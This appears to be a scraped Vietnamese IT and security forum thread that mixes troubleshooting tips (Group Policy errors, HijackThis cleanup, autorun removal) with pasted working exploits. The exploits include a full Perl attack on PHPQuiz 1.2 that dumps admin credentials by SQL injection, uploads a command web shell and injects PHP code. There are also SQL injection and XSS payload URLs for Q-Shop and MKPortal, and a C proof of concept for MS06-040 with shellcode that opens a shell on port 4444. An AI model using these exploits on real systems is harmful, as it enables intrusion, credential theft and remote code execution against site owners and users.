|
|
Theo microsoft:
Group Policy processing does not work and events 1030 and 1058 are logged in the Application log of a domain controller
Full info: http://support.microsoft.com/kb/842804
Thân
|
|
|
Đúng như anh conmale, site bạn dính XSS nhiều quá, cái phần "Nhật Ký" bị khá nhiều, vui lòng check kỹ lại code.
Thân
|
|
|
Check và PM
Thân
|
|
|
Không hiểu sao server này mở rất nhiều port thế?
Thông tin lỗi tôi sẽ PM bạn.
Thân
|
|
|
Nếu db dung lượng ít thì dùng tool của forum hoặc phpmyadmin backup, còn nếu lớn hơn khoản 100MB thì tốt nhất dùng SSH. Bạn nên hỏi host có hỗ trợ SSH hay không.
|
|
|
Code:
######################################################
#
# Title: PHPQuiz <= v.1.2 Remote SQL injection/Code Execution Exploit
# Vendor : PHPQuiz
# webiste : http://www.phpquiz.com
# Version : <= v.1.2
# Severity: Critical
# Author: Simo64 / simo64_at_morx_org
# MorX Security Reseach Team
# http://www.morx.org
# http://www.morx.org/phpquiz.txt
#
# Details :
#
# SQL injection in score.php
#***************************
#
# univers var in score.php and quiz_id var in home.php are not proprely verified and can be used to inject query
#
# PoC : http://localhost/phpquiz/front/?what=score&univers=[SQL]
# http://localhost/phpquiz/front/?quiz=quiz&univers=1&step=1&quiz_id=[SQL]
#
# Arbitary File Upload
#**********************
# vulnerable code in back/upload_img.php and admin/upload_img.php near lines 74-76
#
# 74 if (($upload) && ($ok_update == "yes")) {
# 75
# 76 if(@copy($image, $path)){
# 77 .....
#
# $upload , $ok_update , $image , $path variables are not sanitized and can be used to upload files
#
# PoC Exploit :
#
# <form enctype="multipart/form-data" method="post" action="http://localhost/phpquiz/back/upload_img.php?upload=1&ok_update=yes&path=./../img_quiz/l3ez.php">
# Download File<br>
# <input name="image" type="file" size="20"><br>
# <input type="submit" name="upload" value="Upload"><form>
#
# phpquiz/img_quiz/ folder is by defaut writable so after uploading a simple phpshell <?passthru($cmd);?>
#
# we can lanche cmd from : http://localhost/phpquiz/img_quiz/l3ez.php?cmd=ls
#
# PHP Code Injection
#********************
#
# cfgphpquiz/install.php is accessible without authentification , the script is used to
# save configuration setting in config.inc.php.
#
# Impact:
# any remote user can post php code to the vulnerable file, view current configuration which contains sensitive information # such as admin password (plain text) and login
#
#***********************************************************************************
#
# simo64@localhost:~$ phpquiz.pl morx.org /phpquiz/ 1
#
# /-----------------------------------------------------------
# | PHPQuiz v.1.2 Remote SQL injection/Code Execution Exploit |
# | Coded by simo64 - simo64_morx.org |
# | www.morx.org |
# |-----------------------------------------------------------|
# | MorX Security Research Team © |
# -----------------------------------------------------------/
#
# Connecting to www.morx.org ... Connected !
#
# [+] Injecting credentials
#
# Sending Data ...
#
# SQL injection Succeded !
#
# User EMail : <a href="mailto:admin@morx.org">admin@morx.org</a>
# User Login : admin
# User Passwd : password
#
# [+] Exec CMD by uploading a shell Connected !
#
# Uploading shell ... [OK]
#
# Checking if successfully Uploaded .... [OK]
#
# NOW YOU CAN LAUNCH COMMANDS
#
# simo64[at]morx.org :~$ id
# uid=48(apache) gid=48(apache) groups=48(apache),2522(psaserv)
# simo64[at]morx.org :~$ pwd
# /home/morx/public_html/phpquiz/img_quiz
# simo64[at]morx.org :~$ ls
# id_1.gif
# id_2.gif
# id_3.gif
# id_4.gif
# index.php
# zaz.php
# simo64[at]morx.org :~$ exit
#
#!/usr/bin/perl
use IO::Socket ;
use LWP::Simple ;
print q(
/-----------------------------------------------------------
| PHPQuiz v.1.2 Remote SQL injection/Code Execution Exploit |
| Coded by simo64 - simo64_morx.org |
| www.morx.org |
|-----------------------------------------------------------|
| MorX Security Research Team © |
-----------------------------------------------------------/
);
sub usage(){
print "nUsage :perl $0 siteurl /path/ useridn";
print "nExemple : perl $0 phpquiz.com /phpquiz/ 1n";
}
if(!@ARGV){
&usage();
exit(0)
}
$host = $ARGV[0];
$path = $ARGV[1];
$uid = $ARGV[2];
$success = null ;
$injected = 0;
$injcheck = $path."cfgphpquiz/config.inc.php?xD=l3fou";
$phpinject = $path."cfgphpquiz/install.php?submit=Valider&config_alert_email_name=%22;echo%20@$xD;@system($morx);//MorX%20RulZ%20=)";
$injectuser = "front/?what=score&univers=-64%20UNION%20SELECT%20null,LOGIN,null,null,null,null,null,null,null,null%20FROM%20user%20WHERE%20ID=$uid/*";
$injectpass = "front/?what=score&univers=-64%20UNION%20SELECT%20null,PWD,null,null,null,null,null,null,null,null%20FROM%20user%20WHERE%20ID=$uid/*";
$injectmail = "front/?what=score&univers=-64%20UNION%20SELECT%20null,EMAIL,null,null,null,null,null,null,null,null%20FROM%20user%20WHERE%20ID=$uid/*";
syswrite STDOUT , "Connecting to $host ...";
my $sock = new IO::Socket::INET ( PeerAddr => "$host",PeerPort => "80",Proto => "tcp",);
die "nnUnable to connect to $host " unless($sock) ;
syswrite STDOUT , "tConnected !nn[+] Injecting credentialsnnSending Data ...";
print $sock "GET $path$injectmail HTTP/1.1n";
print $sock "Host: $hostn";
print $sock "Connection: Closenn";
while($res = <$sock>){
if($res =~ /anim_fleche_droite.gif" border="0"> "(.*?)"</a>/){
$usermail = $1 ;
$success = "ok" ;
}
}
if($success eq "ok") {
syswrite STDOUT , "nnSQL injection Succeded !nn";
sleep 2 ;
syswrite STDOUT , "tUser EMail : $usermailn";
my $sock = new IO::Socket::INET ( PeerAddr => "$host",PeerPort => "80",Proto => "tcp",);
print $sock "GET $path$injectuser HTTP/1.1n";
print $sock "Host: $hostn";
print $sock "Connection: Closenn";
while($res = <$sock>){
if($res =~ /> "(.*?)"/){
$userlogin = $1 ;
}
}
syswrite STDOUT , "tUser Login : $userloginn";
my $sock = new IO::Socket::INET ( PeerAddr => "$host",PeerPort => "80",Proto => "tcp",);
print $sock "GET $path$injectpass HTTP/1.1n";
print $sock "Host: $hostn";
print $sock "Connection: Closenn";
while($res = <$sock>){
if($res =~ /> "(.*?)"/){
$userpass = $1 ;
}
}
syswrite STDOUT , "tUser Passwd : $userpassnn";
} else {print "nnInjecting credentials Exploit Failed !nn";}
sleep 2;
# PART2 Remote Command Execution by uploaing shell
syswrite STDOUT , "n[+] Exec CMD by uploading a shell";
my $sock = new IO::Socket::INET ( PeerAddr => "$host",PeerPort => "80",Proto => "tcp",);
die "nnUnable to connect to $host " unless($sock) ;
syswrite STDOUT , "tConnected !nn";
syswrite STDOUT , "Uploading shell ...";
$data='-----------------------------7d61592213049c
Content-Disposition: form-data; name="dir"
/
-----------------------------7d61592213049c
Content-Disposition: form-data; name="image"; filename="zaz.php"
Content-Type: text/plain
<?php
if (get_magic_quotes_gpc()){$_GET['cmd']=stripslashes($_GET['cmd']);}
passthru($_GET['cmd']);
?>
-----------------------------7d61592213049c
Content-Disposition: form-data; name="submit"
Upload
-----------------------------7d61592213049c--
';
$script = $path."/back/upload_img.php?upload=1&ok_update=yes&path=./../img_quiz/zaz.php";
$len = length $data ;
print $sock "POST $script HTTP/1.0rn";
print $sock "Content-Type: multipart/form-data; boundary=---------------------------7d61592213049crn";
print $sock "Host: $hostrn";
print $sock "Content-Length: $lenrn";
print $sock "Connection: closernrn";
print $sock $data;
syswrite STDOUT , "t[OK]nnChecking if successfully Uploaded .... ";
my $sock = new IO::Socket::INET ( PeerAddr => "$host",PeerPort => "80",Proto => "tcp",);
print $sock "HEAD $path"."img_quiz/zaz.php HTTP/1.0rn";
print $sock "Host: $hostrn";
print $sock "Connection: closenn";
while($rep = <$sock>){
if($rep =~ /HTTP/1.1 200 OK/) { $success = 1; }
}
if($success == 1){
print "t[OK]nnttNOW YOU CAN LAUNCH COMMANDSnn";
while(){
print "simo64[at]morx.org :~$ ";
chop($cmd=<STDIN>);
exit() if ($cmd eq 'exit');
$result = get("http://$host".$path."img_quiz/zaz.php?cmd=$cmd");
print $result;
}
}
else { print "tFailed !nnFile Upload Failednn" }
# STEP 3 Injecting PHPcode into config.inc.php file
print "n[+] Injecting PHP Code......nnConnecting ....";
my $sock = new IO::Socket::INET (PeerAddr => "$host",PeerPort => "80",Proto => "tcp",);
die "Connot Connect to $host !" unless($sock);
print "tConnected !nnSending Data ....t";
print $sock "GET $phpinject HTTP/1.1n";
print $sock "Host: $hostn";
print $sock "Content-Type: application/x-www-form-urlencodedn";
print $sock "User-Agent: MorX-Zillan";
print $sock "Connection: Closenn";
print "t OKnnChecking if code injected ...";
my $sock = new IO::Socket::INET (PeerAddr => "$host",PeerPort => "80",Proto => "tcp",);
print $sock "GET $injcheck HTTP/1.1n";
print $sock "Host: $hostn";
print $sock "Content-Type: application/x-www-form-urlencodedn";
print $sock "User-Agent: MorX-Zillan";
print $sock "Connection: Closenn";
while($check = <$sock>){
if($check =~ /l3fou/) { $injected = 1; }
}
if($injected == 1 ){
print "tSucceded !nntNOW YOU ARE IN !nn";
while(){
print "simo@morx.org :~$ ";
$cmd = <STDIN>;
chop($cmd);
exit(0) if($cmd eq "exit");
$result = get("http://".$host.$path."cfgphpquiz/config.inc.php?morx=$cmd");
print $result;
}
}
else {print "tFailednnPHPCode Injection Failed !nn";}
#
|
|
|
*************************************************************
# Title : Q-Shop v3.5(browse.asp) Remote SQL Injection Vulnerability
# Author : ajann
# Script Page : http://quadcomm.com
# Exploit;
*************************************************************
###http://[target]/[path]/browse.asp?cat=42&ManuID=&OrderBy=[SQL HERE]
Example:
browse.asp?cat=42&ManuID=&OrderBy=1%20union%20select%200,mail,0,pwd,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0%20from%20users
# ajann,Turkey
# ...
|
|
|
Lần sao tìm kiếm kỹ trước khi hỏi
Thân
|
|
|
Máy của cậu có cài Visual Basic ko?
|
|
|
Tôi nhớ cái thông báo error còn khúc sau nữa. Bạn phải có quyền admin mới cài được.
|
|
|
Có lẽ máy nhiễm trojan Troj/Brave-A
Reboot ở Safe Mode và run http://download.hijackthis.eu/hijackthis_199.zip
Kiểm tra những cái này trong HijackThis.
(Lưu ý: Nếu R* không hiện trong Safe Mode, re-run HiJackThis ở chế độ bình thường và xoá nó sau khi bạn xoá những cái sau. Đây là log mà lúc trước máy tôi bị nhiễm)
R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Search Bar = http://g.msn.com/0SEENUS/SAOS01
R1 - HKCU\Software\Microsoft\Internet Explorer\SearchURL,(Default) = about:blank
O2 - BHO: PynixObj Class - {00000000-DD60-0064-6EC2-6E0100000000} - C:\WINNT\Pynix.dll
O2 - BHO: (no name) - {38D4D5D0-423E-4220-B6F9-30918C2AE4A4} - C:\WINNT\sasetup.dll
O2 - BHO: (no name) - {5C8B2A36-3DB1-42A4-A3CB-D426709BBFEB} - (no file)
O2 - BHO: Cls - {CF021F40-3E14-23A5-CBA2-7173706D1316} - C:\WINNT\System32\spm1316.dll (file missing)
O2 - BHO: Cls - {CF021F40-3E14-23A5-CBA2-717765723548} - C:\WINNT\System32\wer3548.dll
O4 - HKLM\..\Run: [farmmext] C:\WINNT\farmmext.exe
O4 - HKLM\..\Run: [mtdiyd] c:\winnt\system32\mtdiyd.exe
O4 - HKLM\..\RunOnce: [Local runole service] C:\WINNT\System32\srvc32.exe
O4 - HKLM\..\RunOnce: [Srv32 spool service] C:\WINNT\System32\spoolsrv32.exe
O4 - HKCU\..\RunOnce: [Local runole service] C:\WINNT\System32\srvc32.exe
O4 - HKCU\..\RunOnce: [Srv32 spool service] C:\WINNT\System32\spoolsrv32.exe
Đóng tất cả cửa sổ ngoại trừ HijackThis và nhấn Fix.
Và trong Safe Mode, delete những cái sau: (nên show hidden files)
(C:\Windows\ hoặc C:\Windows\System32\)
\farmmext.exe
\system32\mtdiyd.exe
\System32\srvc32.exe
\System32\spoolsrv32.exe
Reboot lại xem thử.
Mà tốt nhất cậu scan rồi post file log lên để tôi check sơ.
|
|
|
Vấn đề này tôi gặp là do lỗi copy cả file autorun trong USB qua đè lên autorun trong máy (do Ctrl+A -> Copy -> Paste)
Giờ thì
+ Vô Folder Options-> View --> Show Hidden Files and Folder
+ Bỏ chọn ô Hide protect operating system -> OK
Nhìn vào ổ C/D sẽ xuất hiện 1 file là autorun.exe. Xóa file đó đi, rồi Log Off hoặc Restart. Set lại mấy options trong Folder Option như cũ.
|
|
|
Khi hỏi cũng không ghi rõ main loại gì làm sao giúp. Thử load lại default của nó xem.
|
|
|
Thử vô SafeMode xoá, nếu xoá xong mà vô lại win vẫn còn thì scan virus xem sao
Thân
|
|
|
xxs in MKPortal M1.1 Rc1
info:
file:index.php
google======>MKPortal M1.1 Rc1 ©2003-2005
Exp:
http://www.sitename.com/index.php?ind="><script>alert(1);</script>
--------------------------------------
By Crack_man
|
|
|
Check here:
http://www.zhangduo.com/driverbackup.html
|
|
|
Code:
Class: Input Validation Error
CVE:
Remote: Yes
Local: No
Published: Aug 30 2006 12:00AM
Updated: Aug 30 2006 06:23PM
Credit: imei addmimistrator is credited with the discovery of this vulnerability.
Vulnerable:
MyBulletinBoard MyBulletinBoard 1.1.7
MyBulletinBoard MyBulletinBoard 1.1.6
MyBulletinBoard MyBulletinBoard 1.1.5
MyBulletinBoard MyBulletinBoard 1.1.4
MyBulletinBoard MyBulletinBoard 1.1.3
MyBulletinBoard MyBulletinBoard 1.1.2
MyBulletinBoard MyBulletinBoard 1.1.1
MyBulletinBoard MyBulletinBoard 1.1
MyBulletinBoard MyBulletinBoard 1.0.4
MyBulletinBoard MyBulletinBoard 1.0.3
MyBulletinBoard MyBulletinBoard 1.0.2
MyBulletinBoard MyBulletinBoard 1.0.1
MyBulletinBoard MyBulletinBoard 1.0 PR2
MyBulletinBoard MyBulletinBoard 1.0
Not Vulnerable:
MyBulletinBoard MyBulletinBoard 1.1.8
This issue can be exploited through a web client.
An example URI has been provided:
http://www.example.com/admin/index.php?_SERVER[PHP_SELF]=http://www.example.com
|
|
|
Hi
Mình từng đi cài nhiều dv internet cho bạn bè, dùng DF Enterprise. Thỉnh thoảng vẫn bị sự cố như vậy. Đôi khi lại do dây cáp gắm vào HDD không chặc. Nhưng nếu bạn dùng máy ở nhà thì không nên dùng DF, không tốt cho ổ cứng đâu.
|
|
|
Và nhớ chuẩn bị thêm, không chỉ có mất file system32\hal.dll mà sao khi bạn copy thì sẽ báo thiếu thêm vài file nữa
|
|
|
Rated as : Critical
Code:
/*
* MS06-040 Remote Code Execution Proof of Concept
*
* Ported by ub3r st4r aka iRP
* ---------------------------------------------------------------------
* Tested Against:
* Windows XP SP1
* Windows 2000 SP4
*
* Systems Affected:
* Microsoft Windows 2000 SP0-SP4
* Microsoft Windows XP SP0-SP1
* Microsoft Windows NT 4.0
* ---------------------------------------------------------------------
* This is provided as proof-of-concept code only for educational
* purposes and testing by authorized individuals with permission
* to do so.
*
* PRIVATE v.0.2 (08-27-06)
*/
#include <stdio.h>
#include <windows.h>
#pragma comment(lib, "mpr")
#pragma comment(lib, "Rpcrt4")
// bind uuid interface: 4b324fc8-1670-01d3-1278-5a47bf6ee188 v3.0
unsigned char DCERPC_Bind_RPC_Service[] =
"x05x00x0Bx03x10x00x00x00x48x00x00x00x00x00x00x00"
"xD0x16xD0x16x00x00x00x00x01x00x00x00x00x00x01x00"
"xC8x4Fx32x4Bx70x16xD3x01x12x78x5Ax47xBFx6ExE1x88"
"x03x00x00x00x04x5Dx88x8AxEBx1CxC9x11x9FxE8x08x00"
"x2Bx10x48x60x02x00x00x00";
// request windows api: NetprPathCanonicalize (0x1f)
unsigned char DCERPC_Request_RPC_Service[] =
"x05x00x00x03x10x00x00x00x30x08x00x00x00x00x00x00"
"x18x08x00x00x00x00x1fx00xffxffxffxffx01x00x00x00"
"x00x00x00x00x01x00x00x00x00x00x00x00";
// path ...
unsigned char DCERPC_Request_RPC_Service_[] =
"xfax00x00x00x02x00x00x00x00x00x00x00x02x00x00x00"
"x00x00x00x00xfax00x00x00x00x00x00x00";
unsigned char sc[] =
"x6ax51x59xd9xeexd9x74x24xf4x5bx81x73x13xa8x97x90"
"x88x83xebxfcxe2xf4x29x53x6fx67x57x68xd4x74xc2x7c"
"xddx60x51x68x6fx77xc8x1cxfcxacx8cx1cxd5xb4x23xeb"
"x95xf0xa9x78x1bxc7xb0x1cxcfxa8xa9x7cxd9x03x9cx1c"
"x91x66x99x57x09x24x2cx57xe4x8fx69x5dx9dx89x6ax7c"
"x64xb3xfcxb3xb8xfdx4dx1cxcfxacxa9x7cxf6x03xa4xdc"
"x1bxd7xb4x96x7bx8bx84x1cx19xe4x8cx8bxf1x4bx99x4c"
"xf4x03xebxa7x1bxc8xa4x1cxe0x94x05x1cxd0x80xf6xff"
"x1exc6xa6x7bxc0x77x7exf1xc3xeexc0xa4xa2xe0xdfxe4"
"xa2xd7xfcx68x40xe0x63x7ax6cxb3xf8x68x46xd7x21x72"
"xf6x09x45x9fx92xddxc2x95x6fx58xc0x4ex99x7dx05xc0"
"x6fx5exfbxc4xc3xdbxfbxd4xc3xcbxfbx68x40xeexc0x86"
"xccxeexfbx1ex71x1dxc0x33x8axf8x6fxc0x6fx5exc2x87"
"xc1xddx57x47xf8x2cx05xb9x79xdfx57x41xc3xddx57x47"
"xf8x6dxe1x11xd9xdfx57x41xc0xdcxfcxc2x6fx58x3bxff"
"x77xf1x6exeexc7x77x7exc2x6fx58xcexfdxf4xeexc0xf4"
"xfdx01x4dxfdxc0xd1x81x5bx19x6fxc2xd3x19x6ax99x57"
"x63x22x56xd5xbdx76xeaxbbx03x05xd2xafx3bx23x03xff"
"xe2x76x1bx81x6fxfdxecx68x46xd3xffxc5xc1xd9xf9xfd"
"x91xd9xf9xc2xc1x77x78xffx3dx51xadx59xc3x77x7exfd"
"x6fx77x9fx68x40x03xffx6bx13x4cxccx68x46xdax57x47"
"xf8x67x66x77xf0xdbx57x41x6fx58";
int main(int argc, char* argv[])
{
HANDLE hFile;
NETRESOURCE nr;
char szRemoteName[MAX_PATH], szPipePath[MAX_PATH];
unsigned int i;
unsigned char szInBuf[4096];
unsigned long dwRead, nWritten;
unsigned char szReqBuf[2096];
if (argc < 3){
printf("[-] Usage: ms06040poc <host>
[target]n");
printf("t1 - Windows 2000 SP0-SP4n");
printf("t2 - Windows XP SP0-SP1n");
return -1;
}
memset(szReqBuf, 0, sizeof(szReqBuf));
if (atoi(argv[2]) == 1) {
unsigned char szBuff[1064];
// build payload buffer
memset(szBuff, 'x90', 1000);
memcpy(szBuff+630, sc, sizeof(sc));
for(i=1000; i<1064; i+=4) {
memcpy(szBuff+i, "x04x08x02x00", 4);
}
// build request buffer
memcpy(szReqBuf, DCERPC_Request_RPC_Service,
sizeof(DCERPC_Request_RPC_Service)-1);
memcpy(szReqBuf+44, "x15x02x00x00", 4); /*
max count */
memcpy(szReqBuf+48, "x00x00x00x00", 4); /*
offset */
memcpy(szReqBuf+52, "x15x02x00x00", 4); /*
actual count */
memcpy(szReqBuf+56, szBuff, sizeof(szBuff));
memcpy(szReqBuf+1120, "x00x00x00x00", 4); /*
align string */
memcpy(szReqBuf+1124, DCERPC_Request_RPC_Service_,
sizeof(DCERPC_Request_RPC_Service_)-1);
memcpy(szReqBuf+1140 , "xebx02", 2);
}
if (atoi(argv[2]) == 2) {
unsigned char szBuff[708];
memset(szBuff, 'x90', 612); /* size of shellcode */
memcpy(szBuff, sc, sizeof(sc));
memcpy(szBuff+612, "x0ax08x02x00", 4);
memset(szBuff+616, 'A', 8); // 8 bytes padding
memcpy(szBuff+624, "x04x08x02x00", 4);
memset(szBuff+628, 'x90', 32);
memcpy(szBuff+660, "x04x08x02x00", 4);
memset(szBuff+664, 'B', 8); // 8 bytes padding
memcpy(szBuff+672, "x04x08x02x00", 4);
memset(szBuff+676, 'x90', 32);
// build request buffer
memcpy(szReqBuf, DCERPC_Request_RPC_Service,
sizeof(DCERPC_Request_RPC_Service)-1);
memcpy(szReqBuf+44, "x63x01x00x00", 4); /*
max count */
memcpy(szReqBuf+48, "x00x00x00x00", 4); /*
offset */
memcpy(szReqBuf+52, "x63x01x00x00", 4); /*
actual count */
memcpy(szReqBuf+56, szBuff, sizeof(szBuff));
memcpy(szReqBuf+764, "x00x00x00x00", 4); /*
align string */
memcpy(szReqBuf+768, DCERPC_Request_RPC_Service_,
sizeof(DCERPC_Request_RPC_Service_)-1);
}
printf("[+] Connecting to %s ... n", argv[1]);
_snprintf(szRemoteName, sizeof(szRemoteName),
"\\%s\ipc$", argv[1]);
nr.dwType = RESOURCETYPE_ANY;
nr.lpLocalName = NULL;
nr.lpProvider = NULL;
nr.lpRemoteName = szRemoteName;
if (WNetAddConnection2(&nr, "", "", 0) !=
NO_ERROR) {
printf("[-] Failed to connect to host !n");
return -1;
}
_snprintf(szPipePath, sizeof(szPipePath),
"\\%s\pipe\browser", argv[1]);
hFile = CreateFile(szPipePath, GENERIC_READ|GENERIC_WRITE, 0, NULL,
OPEN_EXISTING, 0, NULL);
if (hFile == INVALID_HANDLE_VALUE) {
printf("[-] Failed to open named pipe !n");
return -1;
}
printf("[+] Binding to RPC interface ... n");
if (TransactNamedPipe(hFile, DCERPC_Bind_RPC_Service,
sizeof(DCERPC_Bind_RPC_Service), szInBuf, sizeof(szInBuf), &dwRead, NULL)
== 0) {
printf("[-] Failed to bind to interface !n");
CloseHandle(hFile);
return -1;
}
printf("[+] Sending RPC request ... n");
if (!WriteFile(hFile, szReqBuf, sizeof(szReqBuf), &nWritten, 0)) {
printf("[-] Unable to transmit RPC request
!n");
CloseHandle(hFile);
return -1;
}
printf("[+] Now check for shell on %s:4444 !n",
argv[1]);
return 0;
}
|
|
|
|
|
|
|